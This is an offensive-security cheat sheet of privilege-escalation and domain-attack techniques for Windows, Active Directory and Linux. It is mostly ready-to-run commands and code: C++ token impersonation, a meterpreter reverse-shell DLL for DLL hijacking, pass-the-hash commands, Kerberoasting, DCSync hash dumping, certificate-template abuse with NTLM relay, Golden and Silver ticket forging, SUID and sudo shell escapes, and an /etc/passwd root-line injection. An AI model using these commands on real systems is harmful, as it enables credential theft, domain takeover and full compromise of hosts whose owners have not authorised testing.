#Windows (Local Focused)
C++ Code for using a token that belongs to another process.
Works by setting the PID_TO_IMPERSONATE variable to a process ID that you have access to.
#include "stdafx.h"
#include <windows.h>
#include <iostream>
int main(int argc, char * argv[]) {
char a;
HANDLE processHandle;
HANDLE tokenHandle = NULL;
HANDLE duplicateTokenHandle = NULL;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
DWORD PID_TO_IMPERSONATE = 3060;
wchar_t cmdline[] = L"C:\\shell.cmd";
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
processHandle = OpenProcess(PROCESS_ALL_ACCESS, true, PID_TO_IMPERSONATE);
OpenProcessToken(processHandle, TOKEN_ALL_ACCESS, &tokenHandle);
DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL, &startupInfo, &processInformation);
std::cin >> a;
return 0;
}Credit to IRed-Team for Code Example
To DLL highjack you must meet two condition.
1 The application must load the dll without denoting the fully qualified path.
2 You must have access to place a file in the appropriate path
DLL's without a fully qualified path load in the following order:
- C:\Windows\System32
- C:\Windows\System
- C:\Windows
- The current working directory
- Directories in the system PATH environment variable
- Directories in the user PATH environment variable
If testing in a Lab, use a custom meterpreter DLL instead of going through the process of creating one
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP> LPORT=<Port> -f dll > <Name_of_the_original_DLL>.dllPlace the DLL in the lowest path possible.
Execute the program.
If vulnerable the meterpreter DLL will run instead of the intended one.
Similar to DLL Highjacking if a service does not wrap its service binary in a fully qualified path using qoutes "c:\progam files\Path\To\Service\Binary.exe "
Then the system will iterate through the folder path until the binary is found.
Using the example:"c:\progam files\Path\To\Service\Binary.exe "
The SC config service will iterate in the folllowing order
- C:\Program Files\Binary.exe
- C:\Program Files\Path\Binary.exe
- C:\Program Files\Path\To\Binary.exe
- C:\Program Files\Path\To\Service\Binary.exe
Invoke-WMIExec Method
Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username administrator -command hostnameInvoke-SMBExec Method
Invoke-SMBExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username administrator -command whoamiImpacket psexec.py Method
psexec.py administrator@ws01 -hashes :32ed87bd5fdc5e9cba88547376818d4CrackMapExec Method
crackmapexec smb ws01 -u administrator -H 32ed87bd5fdc5e9cba88547376818d4 -x hostnameEvil-WinRM Method
evil-winrm -i ws01 -u administrator -H 32ed87bd5fdc5e9cba88547376818d4$Path Interception
This is a "poison the well" type attack
Path Interception abuse is possible if the environment variable is
- 1 The folder is writable by the user
- 2 The folder precedes
c:\Windows\System32For example ifc:\tempis in theenv:Path
In order for this attack to work you must name your malicious file the same name as a shorthand program.
For example calc.exe. This is because calc.exe can be called via the short hand command calc.
When a high privilege user calls calc via run/cmd/powershell/ it will execute the calc.exe file withinC:\temp first before the one in System32
STEP 1: Place a c2 .exe within the c:\temp\ folder
STEP 2: wait for admin user to run calc in run or terminal
Privileged PowerShell Module Path Hijacking
This is a "poison the well" type attack.
PowerShell Module Path hijacking is possible if:
- 1 A directory in
$env:PSModulePathis writable by the user
- 2 That directory appears before the legitimate system module paths
- 3 A privileged PowerShell process imports a module without a full path
In order for this attack to work, you must name your malicious module the same as a commonly imported module.
Step 1: Create a malicious module folder and .psm1 file in a writable directory that exists in $env:PSModulePath
As an example it could be PSReadLine
C:\temp\PSReadLine\PSReadLine.psm1Step 2: Wait for an admin or SYSTEM PowerShell session to import the module by name.
#Active Directory
Abuse service accounts running with elevated privileges
Kerberoasting is possible if:
- 1 A service account has an SPN
- 2 The password is weak or reused to be cracked in hashcat or other preferred tool
# using impacket
GetUserSPNs.py domain.local/user:pass -dc-ip <DC_IP> -requestCrack SPN Hash
hashcat -m 13100 -a 0 <kerberoast.hash> wordlist.txtUsing the cracked password
crackmapexec smb <TARGET> -u <svc_account> -p <cracked_password>Exploit accounts that do not require Kerberos preauthentication
LOW LIKELIHOOD
AS-Rep roasting is possible if:
- 1 Preauth is disabled
- 2 Password is crackable
# using impacket
GetNPUsers.py domain.local/ -dc-ip <DC_IP> -usersfile users.txt -no-pass > asrep.hashesCrack the hash
hashcat -m 18200 asrep.hashes wordlist.txtImpersonate a Domain Controller to dump hashes.
DCSync is possible if:
- 1 The account has replication rights in the domain
Using Mimikatz
dump a specific user
lsadump::dcsync /domain:domain.local /user:krbtgtdump all domain users (noisy)
lsadump::dcsync /domain:domain.local /allUsing Impacket
Dump only a specific user via DRSUAPI.
secretsdump.py domain.local/user:pass@dc01 -just-dc-user krbtgtDump all users via DCSync
secretsdump.py domain.local/user:pass@dc01 -just-dcUsing CrackMapExec
Target a specific account.
crackmapexec smb dc01 -u user -p pass --ntds --user krbtgtUsing PowerView
Invoke-DCSync -Domain domain.local -User krbtgtAbuse excessive object permissions to take control of users or groups.
This is uncommon but at times service accounts or shared user accounts are given excessive permissions due to third party applications requiring them for AD functionality.
ACL Abuse is possible if:
- 1 You control write permissions
Set-ADAccountPassword targetuser -Reset -NewPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force)Inject certificate-based authentication material into a privileged account
Shadow Credentials are possible if:
- 1 You can write
msDS-KeyCredentialLink
Step 1: Inject credentials
certipy shadow auto -u user -p pass -target adminStep 2: Auth using certificate
certipy auth -pfx admin.pfxAbuse a certificate template that allows low-privileged users to enroll and supports client authentication, resulting in a certificate that can be used to authenticate as yourself, but with privileges you should not have (often Domain Admin via group mappings, delegation, or service usage).
Key distinction from ESC-2:
ESC-1 you enroll as yourself, but the cert is usable for privileged auth
ESC-2 you enroll as someone else
ESC-1 is possible if:
- 1 A certificate template allows enrollment by low-priv users
- 2 The certificate template has
ENROLLEE_SUPPLIES_SUBJECTset toTrue - 2 The template allows Client Authentication or Smartcard Logon
- 3 The issued certificate can be used for Kerberos / LDAP auth
- 4 That authentication grants elevated access (directly or indirectly)
Using Certipy
Enumerate vulnerable templates:
certipy find -u 'attacker@corp.local' -p 'Passw0rd!' -dc-ip '10.0.0.100' -text -enabled -vulnerableLook specifically for:
Client Authentication: TrueEnrollment Rights: Domain UsersorDomain ComputersorAuthenticated Users- No manager approval required
Request a certificate for yourself:
certipy req -u 'attacker@corp.local' -p 'Passw0rd!' -dc-ip '10.0.0.100' -target 'CA.CORP.LOCAL' -ca 'CORP-CA' -template 'VulnTemplate' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500'Authenticate using the issued certificate:
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.100Abuse a certificate template that allows the requester to supply arbitrary subject names, enabling certificate issuance for another user, including Domain Admins.
ESC-2 is possible if:
- 1 A certificate template has
ENROLLEE_SUPPLIES_SUBJECT - 2 The attacker can enroll in the template
- 3 The template allows authentication (Client Authentication / Smartcard Logon)
Using Certipy
Enumerate vulnerable templates:
certipy find -u user -p pass -dc-ip <DC_IP>Request a certificate as another user:
certipy req -u user -p pass -ca CA01 -template VulnerableTemplate -upn administrator@domain.localAuthenticate as the target user:
certipy auth -pfx administrator.pfxUsing Certify
Find a vulnerable template:
Certify.exe find /vulnerableRequest a certificate for another user:
Certify.exe request /ca:CA01 /template:VulnerableTemplate /altname:administratorAuthenticate using the certificate (example via Rubeus):
Rubeus.exe asktgt /certificate:administrator.pfxAbuse AD CS web enrollment (/certsrv/) by relaying NTLM authentication to request certificates on behalf of another user or computer.
ESC-8 is possible if:
- 1 AD CS Web Enrollment is enabled
- 2 NTLM authentication is allowed
- 3 SMB/HTTP authentication can be coerced
Using Certipy
Start NTLM relay targeting AD CS:
certipy relay -target http://ca01/ -template DomainControllerCoerce authentication (example using PetitPotam):
python3 petitpotam.py -u exampleuser -p 'Password123!' attacker_ip dc01Authenticate using relayed certificate:
certipy auth -pfx dc01.pfxUsing Impacket
Relay NTLM to AD CS:
ntlmrelayx.py -t http://ca01/certsrv/certfnsh.asp -smb2support --adcs --template DomainControllerTrigger authentication coercion:
python3 petitpotam.py -u exampleuser -p 'Password123!' attacker_ip dc01Use the issued certificate:
certipy auth -pfx dc01.pfxForge arbitrary Kerberos TGTs using the KRBTGT account hash, granting domain-wide authentication without contacting the KDC for validation.
Golden Tickets are possible if:
- 1 The KRBTGT NTLM/AES key is compromised
- 2 You know the domain SID
- 3 You can inject Kerberos tickets into a session
Using Mimikatz
Create and inject a Golden Ticket (RC4/NTLM):
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /krbtgt:<KRBTGT_NTLM> /pttSpecify ticket lifetime (stealth-relevant):
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /krbtgt:<KRBTGT_NTLM> /ticket:golden.kirbi /endin:600Inject an existing ticket:
kerberos::ptt golden.kirbiUsing Impact
Forge a Golden Ticket (NTLM):
ticketer.py -nthash <KRBTGT_NTLM> -domain domain.local -domain-sid S-1-5-21-XXXX AdministratorOr if NTLM isn't preferred. Use AES key instead
ticketer.py -aesKey <KRBTGT_AES256> -domain domain.local -domain-sid S-1-5-21-XXXX AdministratorExport and use the ticket:
export KRB5CCNAME=Administrator.ccacheAuthenticate with the forged ticket:
wmiexec.py domain.local/Administrator@dc01 -k -no-passForge service-specific Kerberos service tickets (TGS) using a service account hash, granting access to one service on one host without contacting the KDC.
Silver Tickets are possible if:
- 1 The target service account hash is compromised
- 2 You know the service SPN
- 3 The service does not strictly validate PACs
Using Mimikatz
Forge a Silver Ticket for CIFS (SMB):
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /target:dc01.domain.local /service:cifs /rc4:<SERVICE_HASH> /pttOr forge it for a HTTP Service:
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /target:web01.domain.local /service:http /rc4:<SERVICE_HASH> /pttAccess the service
dir \\dc01.domain.local\c$Using Impacket
Forge a Silver Ticket (CIFS):
ticketer.py -nthash <SERVICE_HASH> -domain domain.local -domain-sid S-1-5-21-XXXX -spn cifs/dc01.domain.local AdministratorExport the ticket:
export KRB5CCNAME=Administrator.ccacheAccess the service:
smbclient -k //dc01.domain.local/C$#Linux (Local Focused)
Using various apps with sudo perms to escalate the shell
sudo perms to VIM
sudo vim -c ':!/bin/bash'write to root-owned files
sudo tee /etc/sudoersAbuse sudo with preserved environments
sudo -E /bin/bashSUID Bash
bash -pSUID on cp
cp /bin/sh /tmp/rootsh
chmod +s /tmp/rootshSUID on find
find . -exec /bin/sh -p \; -quitSUID on less/more
less /etc/hosts
!/bin/shSUID on awk
awk 'BEGIN {system("/bin/sh")}'SUID on tar
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shSUID on python/python3
python3 -c 'import os; os.execl("/bin/sh","sh","-p")'SUID on perl
perl -e 'exec "/bin/sh";'SUID on env
env /bin/sh -pSUID on openssl
openssl enc -in /bin/sh -out /tmp/rootsh
chmod +s /tmp/rootshA capability is a kernel-enforced permission that allows a process to perform a privileged operation without being root.
Historically, Linux had a binary model:
- UID 0 = god
- Everyone else = no power
Capabilities replace that with:
“This process can do this specific privileged thing, but nothing else.”
At the OS level, root is just a process that has all capabilities enabled.
Capability Discovery (minimal, for context)
getcap -r / 2>/dev/nullCAP_SETUID / CAP_SETGID Abuses
Change effective UID/GID without full root.
Python
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'Perl
perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/sh";'Escalate UID using Python with CAP_SETUID
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
#mount host filesystem with CAP_SYS_ADMIN
mount /dev/sda1 /mntCAP_DAC_READ_SEARCH Abuses
Bypass file read perms
/etc/shadowtar cf - /root | tar xf -CAP_DAC_OVERRIDE
Bypass file read/write permission checks
echo 'root::0:0:root:/root:/bin/bash' >> /etc/passwdCAP_SYS_CHROOT
Change root directory; escape weak chroots.
chroot /mnt /bin/shCron Job Hijacking
Scripts or referenced paths must be writeable by user
Overwrite cron-executed script
echo '/bin/bash' > /path/to/cron/script.shExploit PATH hijack in cron
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATHPATH Hijacking
Privleged scripts that call binary without full path
echo '/bin/bash' > /tmp/python
chmod +x /tmp/pythonService Hijacking
Service Runs as root, executables or configs must be writeable by user
#replace service binary
cp /bin/bash /usr/local/bin/service-binary
chmod +s /usr/local/bin/service-binary#trigger service restart
systemctl restart service-name